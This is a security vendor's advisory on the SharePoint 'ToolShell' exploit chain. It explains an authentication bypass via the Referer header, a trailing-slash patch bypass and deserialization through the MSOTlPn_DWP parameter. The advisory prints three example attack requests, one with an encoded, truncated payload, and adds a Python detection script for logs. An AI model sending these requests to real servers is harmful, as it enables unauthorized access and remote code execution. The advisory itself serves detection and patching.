[2025.08 Vulnerability Report] Microsoft SharePoint RCE Chain: ToolShell | SECaaS Platform AIONCLOUD


This vulnerability is an authentication bypass and insecure deserialization flaw in Microsoft SharePoint Server.
An attacker could bypass authentication and execute malicious code by sending a crafted Referer header and serialized XML data to the ToolPane.aspx page.

This issue was patched in the July security update for Microsoft SharePoint Server, and our AIWAF product will address it with the “Microsoft SharePoint Remote Code Execution” pattern,
which will be included in the August 2025 pattern update.

1. Overview

Microsoft SharePoint Server is an enterprise service for in-house content management, collaboration, and information sharing.

This report summarizes the analysis of ToolShell, a recently discovered authentication bypass and deserialization-based RCE vulnerability in the service
(CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771).

[Figure omitted]

Source: https://www.logpoint.com/en/blog/toolshell-when-sharepoint-becomes-a-gateway-to-rce/

2. Attack Type

ToolShell was demonstrated at the Pwn2Own event in May 2025 as an exploit chain combining CVE-2025-49704 (an insecure deserialization vulnerability) and
CVE-2025-49706 (an authentication bypass vulnerability).

The authentication bypass vulnerability CVE-2025-49706 occurs in the ToolPane.aspx page, which handles critical logic.
Attackers discovered that if the Referer header contained logout page URLs such as /_layouts/SignOut.aspx, /_layouts/14/SignOut.aspx, or /_layouts/15/SignOut.aspx,
the authentication checks could be bypassed, allowing unauthorized access to ToolPane.aspx.

Example attack request:

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7939
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx

Microsoft released a patch in July 2025 to address this vulnerability, but shortly afterward, CVE-2025-53771 was discovered as a bypass, and exploitation cases quickly followed. This bypass worked by appending a forward slash (/) after the ToolPane.aspx path, circumventing the patch.

Example attack request (note the trailing slash after ToolPane.aspx):

POST /_layouts/15/ToolPane.aspx/?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7939
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx

The second vulnerability in the chain, CVE-2025-49704, is an insecure deserialization issue in the MSOTlPn_DWP parameter, which accepts serialized control markup for ToolPane.aspx page controls. Attackers could submit malicious serialized XML (carrying a Base64-encoded payload) in this parameter and have it deserialized and executed on the server.

Although Microsoft issued a patch in early July 2025, it failed to fully address the underlying issue. As a result, CVE-2025-53770 was identified as a related flaw chained with CVE-2025-53771, and active exploitation was observed.

Example attack request (CVE-2025-53771 + CVE-2025-53770):

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7939
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx

MSOTlPn_Uri%3Dhttps%3A%2F%2Ftarget%2F_controltemplates%2F15%2FAclEditor.ascx%26MSOTlPn_DWP%3D%0A++++%3C%25%40+Register+Tagprefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%0A++++%3C%25%40+Register+Tagprefix%3D%22asp%22+Namespace%3D%22System.Web.UI%22+Assembly%3D%22System.Web.Extensions%2C+Version%3D4.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D31bf3856ad364e35%22+%25%3E%0A%0A%3Casp%3AUpdateProgress+ID%3D%22UpdateProgress1%22+DisplayAfter%3D%2210%22+%0Arunat%3D%22server%22+AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%3CProgressTemplate%3E%0A++%3Cdiv+class%3D%22divWaiting%22%3E++++++++++++%0A++++%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIA...Hv%2F%2FI%2FufAsz%2FlDAAA%3D%22+DataTable-CaseSensitive%3D%22false%22+runat%3D%22server%22%3E%0A%3C%2FScorecard%3AExcelDataSet%3E%0A++%3C%2Fdiv%3E%0A%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A++++

Source: https://github.com/kaizensecurity/CVE-2025-53770
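The three requests above share a small set of observable indicators: a request to ToolPane.aspx (with or without the trailing-slash variant), a SignOut.aspx Referer, and an MSOTlPn_DWP body parameter carrying control markup. The following detection logic is an added example, not code from AIONCLOUD or any of the cited sources; it runs over constructed request records that mirror the shape of the requests shown in this report, decoding percent-encoding first so that an encoded path or a double-encoded body cannot slip past the checks.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the report: ToolPane.aspx under /_layouts/ (optional version
# segment, optional trailing slash), a SignOut.aspx Referer, and the MSOTlPn_DWP
# body parameter whose markup in the observed payload wraps a Scorecard:ExcelDataSet.
TOOLPANE_RE = re.compile(r"/_layouts/(?:\d+/)?toolpane\.aspx(/?)(?:[?#]|$)", re.I)
SIGNOUT_RE = re.compile(r"/_layouts/(?:\d+/)?signout\.aspx", re.I)
DWP_RE = re.compile(r"(?:^|&)MSOTlPn_DWP=", re.I)
EXCEL_RE = re.compile(r"ExcelDataSet\b.*?CompressedDataTable=", re.I | re.S)


def classify(req):
    """Return the list of findings for one request record (empty list = nothing seen)."""
    findings = []
    # Decode percent-encoding so an encoded dot, slash or '&' cannot hide the indicators.
    path = unquote_plus(req.get("path", ""))
    body = unquote_plus(req.get("body", ""))
    tp = TOOLPANE_RE.search(path)
    if tp and SIGNOUT_RE.search(req.get("referer", "")):
        findings.append("ToolPane.aspx reached with SignOut.aspx Referer (CVE-2025-49706)")
        if tp.group(1):  # "/" captured after ToolPane.aspx
            findings.append("trailing-slash path variant (CVE-2025-53771)")
    if tp and DWP_RE.search(body):
        findings.append("MSOTlPn_DWP control markup submitted (CVE-2025-49704/53770)")
        if EXCEL_RE.search(body):
            findings.append("ExcelDataSet CompressedDataTable present in markup")
    return findings


def scan(records):
    """Map record index -> findings for every record that triggered at least one rule."""
    hits = {}
    for i, rec in enumerate(records):
        found = classify(rec)
        if found:
            hits[i] = found
    return hits


# Constructed sample records (not real traffic). Record 0 mirrors the double-encoded body
# from the report with the compressed blob shortened to a placeholder; record 1 is the
# trailing-slash variant; records 2 and 3 are benign look-alikes that must not fire.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
     "referer": "/_layouts/SignOut.aspx",
     "body": "MSOTlPn_Uri%3Dhttps%3A%2F%2Ftarget%2F_controltemplates%2F15%2FAclEditor.ascx"
             "%26MSOTlPn_DWP%3D%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sI...%22%3E"},
    {"method": "POST", "path": "/_layouts/15/ToolPane.aspx/?DisplayMode=Edit&a=/ToolPane.aspx",
     "referer": "https://target/_layouts/15/SignOut.aspx", "body": "MSOTlPn_DWP=%3Cdiv%3E"},
    {"method": "GET", "path": "/_layouts/15/ToolPane.aspx?DisplayMode=Edit",
     "referer": "https://target/sites/hr/default.aspx", "body": ""},
    {"method": "POST", "path": "/_layouts/15/start.aspx",
     "referer": "/_layouts/SignOut.aspx", "body": "MSOTlPn_DWP=x"},
]
```

Fed with parsed IIS or reverse-proxy request records in the same dictionary shape, scan() returns only the records that match, so it can run as a post-incident triage pass over logs from the July 2025 exposure window.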

3. Mitigation

On July 8, 2025, Microsoft released patches addressing CVE-2025-49704 and CVE-2025-49706. On July 19, 2025, further patches were issued for the actively exploited CVE-2025-53770 and CVE-2025-53771.

These vulnerabilities affect Microsoft SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Server 2016.
Users of these products must verify and apply the latest security updates immediately.

Our AIWAF product will address this threat with the new “Microsoft SharePoint Remote Code Execution” pattern, included in the August 2025 pattern update.

4. Conclusion

Microsoft SharePoint Server is a widely used collaboration platform across enterprises worldwide.
The vulnerabilities disclosed are relatively straightforward to exploit, and related information is already publicly available.
Furthermore, CISA confirmed exploitation activity and added these CVEs to the KEV catalog immediately after patch releases, underscoring the high risk.

Organizations using Microsoft SharePoint Server must promptly update to the latest versions.
Our Threat Analysis team will continue monitoring vulnerabilities related to Microsoft SharePoint Server and respond rapidly to newly discovered issues.
